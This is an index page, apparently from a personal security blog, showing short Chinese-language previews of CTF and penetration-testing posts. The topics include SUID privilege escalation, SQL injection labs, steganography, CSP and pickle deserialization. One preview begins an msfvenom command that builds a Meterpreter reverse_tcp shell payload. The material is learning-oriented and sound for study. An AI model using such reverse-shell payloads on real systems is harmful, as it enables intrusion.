-
Meterpreter
# Meterpreter # reverse_shell # reverse_tcp Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=44... -
SUID
# SUID 提权 suid (set uid) 是 linux 中的一种特殊权限,suid 可以让调用者以文件拥有者身份运行该文件,所以利用 suid 提权的核心就是运行 root 用户所拥有的 suid 的文件,那么运行该文件的时候就得获得 ro... -
Reconnaissance
# Passive Reconnaissance # Whois WHOIS 信息查询 - 站长工具 (wujingquan.com) kali 上: # nslookup and dig Query type 查询类型 Result 结果... -
MISC Picture
# MISC—Picture 一键梭哈网站:https://aperisolve.fr/ # 盲水印隐写 一张图片的情况 可以使用 隐形水印工具 V1.2 或者 WaterMark 来提取水印 两张图片的情况 123先把要处理的图片拉入BlindW... -
MISC EN/DECode
CTF—MISC [!IMPORTANT] 参考Lunatic师傅的文章:https://goodlunatic.github.io/posts/1ad9200 ⚠👆👆👆👆👆⚠ 加密/编码base123456789101112... -
portswigger SqlInjection
portswigger靶场 SQL注入SQL injection cheat sheet | Web Security Academy (portswigger.net) SQL injection - Fc04dB’s BLOG 🧪实验1:W... -
2024网鼎杯-青龙组
# MISC03 wireshark 打开数据包 全局搜索响应码为 200 的包第三步:经过很多尝试找出正确 ip: 下面记事本是赛题下线之前的记录,重新上线后一个一个尝试发现正确 flag 也可以通过脚本提取所有 ip 然后一个一个试 12345... -
CSP
# 内容安全策略(CSP) # 同源策略 同源策略(Same origin policy)是一种约定 是浏览器的行为,是为了保护本地数据不被 JavaScript 代码获取回来的数据污染,因此拦截的是客户端发出的请求回来的数据接收,即请求发送了,服务... -
DASCTF 2024 十月赛
# DASCTF 2024 十月赛 # ezlogin EditController.edit 中 /editPass 路由接受用户输入的 newPass UserUtil.changePassword 方法用到了 newPass 参数: 并且是... -
pickle反序列化
# pickle pickle 是 Python 的一个库,可以对一个对象进行序列化和反序列化操作。其中 __reduce__ 魔法函数会在一个对象被反序列化时自动执行,我们可以通过在 __reduce__ 魔法函数内植入恶意代码的方式进行任意命令执...
Fc04dB -- Hu14T0n
